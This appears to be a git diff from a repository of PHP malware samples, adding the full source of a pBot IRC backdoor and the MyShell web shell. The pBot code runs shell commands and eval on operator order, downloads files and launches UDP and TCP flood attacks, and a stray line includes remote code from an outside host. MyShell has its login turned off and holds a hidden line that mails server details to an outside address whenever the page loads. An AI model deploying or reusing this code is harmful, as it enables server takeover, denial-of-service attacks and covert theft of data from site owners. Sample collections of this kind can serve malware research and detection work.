unlink("dc.pl");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$bot = new pBot;
|
||||||
|
$bot->start();
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
<?php include("http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt");?>
|
366
PHP/Backdoor.PHP.Pbot.g
Normal file
366
PHP/Backdoor.PHP.Pbot.g
Normal file
@ -0,0 +1,366 @@
|
|||||||
|
<?
|
||||||
|
|
||||||
|
set_time_limit(0);
|
||||||
|
error_reporting(0);
|
||||||
|
|
||||||
|
class pBot
|
||||||
|
{
|
||||||
|
var $config = array("server"=>"irc.chatbr.org",
|
||||||
|
"port"=>6667,
|
||||||
|
"pass"=>"", //senha do server
|
||||||
|
"prefix"=>"Twi",
|
||||||
|
"maxrand"=>8,
|
||||||
|
"chan"=>"#CS",
|
||||||
|
"key"=>"", //senha do canal
|
||||||
|
"modes"=>"+p",
|
||||||
|
"password"=>"twi123", //senha do bot
|
||||||
|
"trigger"=>".",
|
||||||
|
"hostauth"=>"*" // * for any hostname
|
||||||
|
);
|
||||||
|
var $users = array();
|
||||||
|
function start()
|
||||||
|
{
|
||||||
|
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
|
||||||
|
$this->start();
|
||||||
|
$ident = "divouxd1";
|
||||||
|
$alph = range("a","z");
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$ident .= $alph[rand(0,25)];
|
||||||
|
if(strlen($this->config['pass'])>0)
|
||||||
|
$this->send("PASS ".$this->config['pass']);
|
||||||
|
$this->send("USER $ident 127.0.0.1 localhost :$ident");
|
||||||
|
$this->set_nick();
|
||||||
|
$this->main();
|
||||||
|
}
|
||||||
|
function main()
|
||||||
|
{
|
||||||
|
while(!feof($this->conn))
|
||||||
|
{
|
||||||
|
$this->buf = trim(fgets($this->conn,512));
|
||||||
|
$cmd = explode(" ",$this->buf);
|
||||||
|
if(substr($this->buf,0,6)=="PING :")
|
||||||
|
{
|
||||||
|
$this->send("PONG :".substr($this->buf,6));
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1] =="001")
|
||||||
|
{
|
||||||
|
$this->send("MODE ".$this->nick." ".$this->config['modes']);
|
||||||
|
$this->join($this->config['chan'],$this->config['key']);
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1]=="433")
|
||||||
|
{
|
||||||
|
$this->set_nick();
|
||||||
|
}
|
||||||
|
if($this->buf != $old_buf)
|
||||||
|
{
|
||||||
|
$mcmd = array();
|
||||||
|
$msg = substr(strstr($this->buf," :"),2);
|
||||||
|
$msgcmd = explode(" ",$msg);
|
||||||
|
$nick = explode("!",$cmd[0]);
|
||||||
|
$vhost = explode("@",$nick[1]);
|
||||||
|
$vhost = $vhost[1];
|
||||||
|
$nick = substr($nick[0],1);
|
||||||
|
$host = $cmd[0];
|
||||||
|
if($msgcmd[0]==$this->nick)
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i+1];
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i];
|
||||||
|
}
|
||||||
|
if(count($cmd)>2)
|
||||||
|
{
|
||||||
|
switch($cmd[1])
|
||||||
|
{
|
||||||
|
case "QUIT":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PART":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PRIVMSG":
|
||||||
|
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "user":
|
||||||
|
if($mcmd[1]==$this->config['password'])
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2Auth\2]: $nick logado!");
|
||||||
|
$this->log_in($host);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2Auth\2]: Senha errada! $nick");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "restart":
|
||||||
|
$this->send("QUIT :restart");
|
||||||
|
fclose($this->conn);
|
||||||
|
$this->start();
|
||||||
|
break;
|
||||||
|
case "mail": //mail to from subject message
|
||||||
|
if(count($mcmd)>4)
|
||||||
|
{
|
||||||
|
$header = "From: <".$mcmd[2].">";
|
||||||
|
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Isur00tossivel mandar e-mail.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "dns":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$ip = explode(".",$mcmd[1]);
|
||||||
|
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "info":
|
||||||
|
$this->privmsg($this->config['chan'],"[\2Vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."]");
|
||||||
|
break;
|
||||||
|
case "bot":
|
||||||
|
$this->privmsg($this->config['chan'],"[\2Bot by matapato v1.2\2]");
|
||||||
|
break;
|
||||||
|
case "cmd":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2cmd\2]: $command");
|
||||||
|
$pipe = popen($command,"r");
|
||||||
|
while(!feof($pipe))
|
||||||
|
{
|
||||||
|
$pbuf = trim(fgets($pipe,512));
|
||||||
|
if($pbuf != NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : $pbuf");
|
||||||
|
}
|
||||||
|
pclose($pipe);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "rndnick":
|
||||||
|
$this->set_nick();
|
||||||
|
break;
|
||||||
|
case "sur00t":
|
||||||
|
$this->send(strstr($msg,$mcmd[1]));
|
||||||
|
break;
|
||||||
|
case "php":
|
||||||
|
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
|
||||||
|
break;
|
||||||
|
case "exec":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = shell_exec($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2exec\2]: $command");
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
case "pscan": // .pscan 127.0.0.1 6667
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
|
||||||
|
else
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "ud.server": // .ud.server <server> <port> [password]
|
||||||
|
if(count($mcmd)>2)
|
||||||
|
{
|
||||||
|
$this->config['server'] = $mcmd[1];
|
||||||
|
$this->config['port'] = $mcmd[2];
|
||||||
|
if(isset($mcmcd[3]))
|
||||||
|
{
|
||||||
|
$this->config['pass'] = $mcmd[3];
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "download":
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(!$fp = fopen($mcmd[2],"w"))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(!$get = file($mcmd[1]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<=count($get);$i++)
|
||||||
|
{
|
||||||
|
fwrite($fp,$get[$i]);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
|
||||||
|
}
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "die":
|
||||||
|
$this->send("QUIT :MORRI! comando por $nick");
|
||||||
|
fclose($this->conn);
|
||||||
|
exit;
|
||||||
|
case "logout":
|
||||||
|
$this->log_out($host);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
|
||||||
|
break;
|
||||||
|
case "udpflood":
|
||||||
|
if(count($mcmd)>3)
|
||||||
|
{
|
||||||
|
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "tcpflood":
|
||||||
|
if(count($mcmd)>5)
|
||||||
|
{
|
||||||
|
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$old_buf = $this->buf;
|
||||||
|
}
|
||||||
|
$this->start();
|
||||||
|
}
|
||||||
|
function send($msg)
|
||||||
|
{
|
||||||
|
fwrite($this->conn,"$msg\r\n");
|
||||||
|
|
||||||
|
}
|
||||||
|
function join($chan,$key=NULL)
|
||||||
|
{
|
||||||
|
$this->send("JOIN $chan $key");
|
||||||
|
}
|
||||||
|
function privmsg($to,$msg)
|
||||||
|
{
|
||||||
|
$this->send("PRIVMSG $to :$msg");
|
||||||
|
}
|
||||||
|
function is_logged_in($host)
|
||||||
|
{
|
||||||
|
if(isset($this->users[$host]))
|
||||||
|
return 1;
|
||||||
|
else
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
function log_in($host)
|
||||||
|
{
|
||||||
|
$this->users[$host] = true;
|
||||||
|
}
|
||||||
|
function log_out($host)
|
||||||
|
{
|
||||||
|
unset($this->users[$host]);
|
||||||
|
}
|
||||||
|
function set_nick()
|
||||||
|
{
|
||||||
|
if(isset($_SERVER['SERVER_SOFTWARE']))
|
||||||
|
{
|
||||||
|
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
|
||||||
|
$this->nick = "[A]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
|
||||||
|
$this->nick = "[I]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
|
||||||
|
$this->nick = "[X]";
|
||||||
|
else
|
||||||
|
$this->nick = "[U]";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->nick = "[C]";
|
||||||
|
}
|
||||||
|
$this->nick .= $this->config['prefix'];
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$this->nick .= mt_rand(0,9);
|
||||||
|
$this->send("NICK ".$this->nick);
|
||||||
|
}
|
||||||
|
function udpflood($host,$packetsize,$time) {
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
|
||||||
|
$timei = time();
|
||||||
|
$i = 0;
|
||||||
|
while(time()-$timei < $time) {
|
||||||
|
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
$env = $i * $packetsize;
|
||||||
|
$env = $env / 1048576;
|
||||||
|
$vel = $env / $time;
|
||||||
|
$vel = round($vel);
|
||||||
|
$env = round($env);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
|
||||||
|
}
|
||||||
|
function tcpflood($host,$packets,$packetsize,$port,$delay)
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++)
|
||||||
|
$packet .= chr(mt_rand(1,256));
|
||||||
|
for($i=0;$i<$packets;$i++)
|
||||||
|
{
|
||||||
|
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
sleep($delay);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$bot = new pBot;
|
||||||
|
$bot->start();
|
||||||
|
|
||||||
|
?>
|
2026
PHP/Backdoor.PHP.PhpShell.h
Normal file
2026
PHP/Backdoor.PHP.PhpShell.h
Normal file
File diff suppressed because one or more lines are too long
1011
PHP/Backdoor.PHP.PhpShell.k
Normal file
1011
PHP/Backdoor.PHP.PhpShell.k
Normal file
File diff suppressed because it is too large
Load Diff
1009
PHP/Backdoor.PHP.PhpShell.l
Normal file
1009
PHP/Backdoor.PHP.PhpShell.l
Normal file
File diff suppressed because it is too large
Load Diff
420
PHP/Backdoor.PHP.PhpShell.m
Normal file
420
PHP/Backdoor.PHP.PhpShell.m
Normal file
@ -0,0 +1,420 @@
|
|||||||
|
<?php
|
||||||
|
/*
|
||||||
|
**************************************************************
|
||||||
|
* MyShell *
|
||||||
|
**************************************************************
|
||||||
|
$Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
|
||||||
|
|
||||||
|
An interactive PHP-page that will execute any command entered.
|
||||||
|
See the files README and INSTALL or http://www.digitart.net for
|
||||||
|
further information.
|
||||||
|
Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
|
||||||
|
based on the original program phpShell by Martin Geisler
|
||||||
|
|
||||||
|
This program is free software; you can redistribute it and/or
|
||||||
|
modify it under the terms of the GNU General Public License
|
||||||
|
as published by the Free Software Foundation; either version 2
|
||||||
|
of the License, or (at your option) any later version.
|
||||||
|
|
||||||
|
This program is distributed in the hope that it will be useful,
|
||||||
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
GNU General Public License for more details.
|
||||||
|
|
||||||
|
You can get a copy of the GNU General Public License from this
|
||||||
|
address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#$selfSecure enables built-in authenticate feature. This must be 0 in order to
|
||||||
|
#use .htaccess file or other alternative method to control access to MyShell.
|
||||||
|
#Set up your user and password using $shellUser and $shellPswd.
|
||||||
|
#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
|
||||||
|
#ACCESS TO THE SCRIPT.
|
||||||
|
|
||||||
|
$selfSecure = 0;
|
||||||
|
$shellUser = "";
|
||||||
|
$shellPswd = "";
|
||||||
|
|
||||||
|
#$adminEmail is the email address to send warning notifications in case
|
||||||
|
#someone tries to access the script and fails to provide correct user and
|
||||||
|
#password. This only works if you have $selfSecure enabeled.
|
||||||
|
|
||||||
|
$adminEmail = "******@mail.ru";
|
||||||
|
|
||||||
|
#$fromEmail is the email address warning messages are sended from.
|
||||||
|
#This defaults to the server admin, but you can change
|
||||||
|
#to any address you want i.e.: noreplay@yourdomain.com
|
||||||
|
#This only works if you have $selfSecure enabeled.
|
||||||
|
|
||||||
|
$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"];
|
||||||
|
|
||||||
|
#$dirLimit is the top directory allowed to change when using cd command
|
||||||
|
#or the form selector. Any attempt to change to a directory up to this
|
||||||
|
#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
|
||||||
|
#It is a good practice to set it to $DOCUMENT_ROOT using:
|
||||||
|
#$dirLimit = $DOCUMENT_ROOT;
|
||||||
|
#If you want to have access to all server directories leave it blank.
|
||||||
|
#WARNING: Althought a user won't be able to snoop on directories above
|
||||||
|
#this level using MyShell, he/she will still be able to excecute
|
||||||
|
#commands on any directory where Webserver has permission,
|
||||||
|
#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
|
||||||
|
|
||||||
|
$dirLimit = "";
|
||||||
|
|
||||||
|
#$autoErrorTrap Enable automatic error traping if command returns error.
|
||||||
|
#Bear in mind that MyShell executes the command a second time in order to
|
||||||
|
#trap the stderr. This shouldn't be a problem in most cases.
|
||||||
|
#If you turn it off, you'll have to select either to trap stderr or not for
|
||||||
|
#every command you excecute.
|
||||||
|
|
||||||
|
$autoErrorTrap = 1;
|
||||||
|
|
||||||
|
#$voidCommands is the list of commands that MyShell won't run by any means.
|
||||||
|
#It defaults to known problematic commands from a web interface like pico,
|
||||||
|
#top, xterm but also it can include specific commands you don't want to
|
||||||
|
#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
|
||||||
|
|
||||||
|
$voidCommands = array("top","xterm","su","vi","pico","netscape");
|
||||||
|
|
||||||
|
#$TexEd Built-in Text Editor prefered name. This is the command you'll use
|
||||||
|
#to invoke MyShell's built in text editor.
|
||||||
|
# If you are used to type pico or vi for your fav text editor,
|
||||||
|
#change this to your please. i.e.:
|
||||||
|
# $TexEd = "pico";
|
||||||
|
#will allow you to type 'pico config.php' to edit the file config.php
|
||||||
|
#MyShell's text editor do not support usual commands in pico, vi etc.
|
||||||
|
#Don't forget to take off this command from the $voidCommands list
|
||||||
|
$TexEd = "edit";
|
||||||
|
|
||||||
|
#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
|
||||||
|
#is usefull when you have to edit files with long lines, i.e.: in php code
|
||||||
|
#files, because otherwise it is no easy to distinguish a real new line (CR)
|
||||||
|
#from a wraped one. If you prefer to stick to the default wraped mode of
|
||||||
|
#TEXTAREA just leave this blank i.e.: $editWrap="".
|
||||||
|
$editWrap ="wrap='OFF'";
|
||||||
|
|
||||||
|
#Cosmetic defaults.
|
||||||
|
|
||||||
|
$termCols = 80; //Default width of the output text area
|
||||||
|
$termRows = 20; //Default heght of the output text area
|
||||||
|
$bgColor = "#000000"; //background color
|
||||||
|
$bgInputColor = "#333333"; //color of the input field
|
||||||
|
$outColor = "#00BB00"; //color of the text output from the server
|
||||||
|
$textColor = "#009900"; //color of the hard texts of the terminal
|
||||||
|
$linkColor = "#00FF00"; //color of the links
|
||||||
|
|
||||||
|
/************** No customize needed from this point *************/
|
||||||
|
|
||||||
|
$MyShellVersion = "MyShell 1.1.0 build 20010923";
|
||||||
|
if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
|
||||||
|
if($selfSecure){
|
||||||
|
if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
|
||||||
|
Header('WWW-Authenticate: Basic realm="MyShell"');
|
||||||
|
Header('HTTP/1.0 401 Unauthorized');
|
||||||
|
echo "<html>
|
||||||
|
<head>
|
||||||
|
<title>$MyShellVersion - Access Denied</title>
|
||||||
|
</head>
|
||||||
|
<h1>Access denied</h1>
|
||||||
|
A warning message have been sended to the administrator
|
||||||
|
<hr>
|
||||||
|
<em>$MyShellVersion</em>";
|
||||||
|
if(isset($PHP_AUTH_USER)){
|
||||||
|
$warnMsg ="
|
||||||
|
This is $MyShellVersion
|
||||||
|
installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
|
||||||
|
just to let you know that somebody tryed to access
|
||||||
|
the script using wrong username or password:
|
||||||
|
|
||||||
|
Date: ".date("Y-m-d H:i:s")."
|
||||||
|
IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
|
||||||
|
User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
|
||||||
|
username used: $PHP_AUTH_USER
|
||||||
|
password used: $PHP_AUTH_PW
|
||||||
|
|
||||||
|
If this is not the first time it happens,
|
||||||
|
please consider either to remove MyShell
|
||||||
|
from your system or change it's name or
|
||||||
|
directory location on your server.
|
||||||
|
|
||||||
|
Regards
|
||||||
|
The MyShell dev team
|
||||||
|
";
|
||||||
|
mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
|
||||||
|
"From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
|
||||||
|
}
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
//Function that validate directories
|
||||||
|
function validate_dir($dir){
|
||||||
|
GLOBAL $dirLimit;
|
||||||
|
if($dirLimit){
|
||||||
|
$cdPos = strpos($dir,$dirLimit);
|
||||||
|
if ((string)$cdPos == "") {
|
||||||
|
$dir = $dirLimit;
|
||||||
|
$GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return $dir;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set working directory.
|
||||||
|
if (isset($work_dir)) {
|
||||||
|
//A workdir has been asked for - we chdir to that dir.
|
||||||
|
$work_dir = validate_dir($work_dir);
|
||||||
|
@chdir($work_dir) or
|
||||||
|
($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
|
||||||
|
$work_dir = exec("pwd");
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
// No work_dir - we chdir to $DOCUMENT_ROOT
|
||||||
|
$work_dir = validate_dir($DOCUMENT_ROOT);
|
||||||
|
chdir($work_dir);
|
||||||
|
$work_dir = exec("pwd");
|
||||||
|
}
|
||||||
|
|
||||||
|
//Now we handle files if we are in Edit Mode
|
||||||
|
if($editMode && ($command||$editCancel))$editMode=false;
|
||||||
|
if($editMode){
|
||||||
|
if($editSave ||$editSaveExit){
|
||||||
|
if(function_exists(ini_set))ini_set("track_errors","1");
|
||||||
|
if($fp=@fopen($file,"w")){
|
||||||
|
if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
|
||||||
|
fputs($fp,$shellOut);
|
||||||
|
fclose($fp);
|
||||||
|
$command = $TexEd." ".$file;
|
||||||
|
if($editSaveExit) {
|
||||||
|
$command="";
|
||||||
|
$shellOutput="MyShell: $file: saved";
|
||||||
|
$editMode=false;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$command="";
|
||||||
|
$shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
|
||||||
|
$errorSave=true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
//Separate command(s) and arguments to analize first command
|
||||||
|
$input=explode(" ",$command);
|
||||||
|
|
||||||
|
while (list ($key, $val) = each ($voidCommands)) {
|
||||||
|
if($input[0]==$val){
|
||||||
|
$voidCmd = $input[0];
|
||||||
|
$input[0]="void";
|
||||||
|
}
|
||||||
|
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||||
|
switch($input[0]){
|
||||||
|
case "cd":
|
||||||
|
$path=$input[1];
|
||||||
|
if ($path==".."){
|
||||||
|
$work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
|
||||||
|
if ($work_dir == "") $work_dir = "/";
|
||||||
|
}
|
||||||
|
elseif (substr($path,0,1)=="/")$work_dir=$path;
|
||||||
|
else $work_dir=$work_dir."/".$path;
|
||||||
|
$work_dir = validate_dir($work_dir);
|
||||||
|
@chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
|
||||||
|
$work_dir = exec("pwd");
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
break;
|
||||||
|
case "man":
|
||||||
|
exec($command,$man);
|
||||||
|
if($man){
|
||||||
|
$codes = ".".chr(8);
|
||||||
|
$manual = implode("\n",$man);
|
||||||
|
$shellOutput = ereg_replace($codes,"",$manual);
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
else $stderr=1;
|
||||||
|
break;
|
||||||
|
case "cat":
|
||||||
|
exec($command,$cat);
|
||||||
|
if($cat){
|
||||||
|
$text = implode("\n",$cat);
|
||||||
|
$shellOutput = htmlspecialchars($text);
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
else $stderr=1;
|
||||||
|
break;
|
||||||
|
case "more":
|
||||||
|
exec($command,$cat);
|
||||||
|
if($cat){
|
||||||
|
$text = implode("\n",$cat);
|
||||||
|
$shellOutput = htmlspecialchars($text);
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
else $stderr=1;
|
||||||
|
break;
|
||||||
|
case $TexEd:
|
||||||
|
if(file_exists($input[1])){
|
||||||
|
exec("cat ".$input[1],$cat);
|
||||||
|
$text = implode("\n",$cat);
|
||||||
|
$shellOutput = htmlspecialchars($text);
|
||||||
|
$fileOwner = posix_getpwuid(fileowner($input[1]));
|
||||||
|
$filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
|
||||||
|
$fileEditInfo = " ::::::: Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
|
||||||
|
}
|
||||||
|
else $fileEditInfo = " ::::::: <font color=$linkColor>NEW FILE</font>";
|
||||||
|
$currFile = $input[1];
|
||||||
|
$editMode = true;
|
||||||
|
$command = "";
|
||||||
|
break;
|
||||||
|
case "void":
|
||||||
|
$shellOutput = "MyShell: $voidCmd: void command for MyShell";
|
||||||
|
$commandBk = $command;
|
||||||
|
$command = "";
|
||||||
|
}
|
||||||
|
|
||||||
|
//Now we prepare the webpage
|
||||||
|
if(!$oCols)$oCols=$termCols;
|
||||||
|
if(!$oRows)$oRows=$termRows;
|
||||||
|
if($editMode)$focus="shellOut.focus()";
|
||||||
|
else $focus="command.select()";
|
||||||
|
//WhoamI
|
||||||
|
if(!$whoami)$whoami=exec("whoami");
|
||||||
|
?>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title><?echo $MyShellVersion?></title>
|
||||||
|
<style>
|
||||||
|
body{
|
||||||
|
background-color: <?echo $bgColor ?>;
|
||||||
|
font-family : sans-serif;
|
||||||
|
font-size : 10px;
|
||||||
|
scrollbar-face-color: #666666;
|
||||||
|
scrollbar-shadow-color: <?echo $bgColor ?>;
|
||||||
|
scrollbar-highlight-color: #999999;
|
||||||
|
scrollbar-3dlight-color: <?echo $bgColor ?>;
|
||||||
|
scrollbar-darkshadow-color: <?echo $bgColor ?>;
|
||||||
|
scrollbar-track-color: <?echo $bgInputColor ?>;
|
||||||
|
scrollbar-arrow-color: <?echo $textColor ?>;
|
||||||
|
}
|
||||||
|
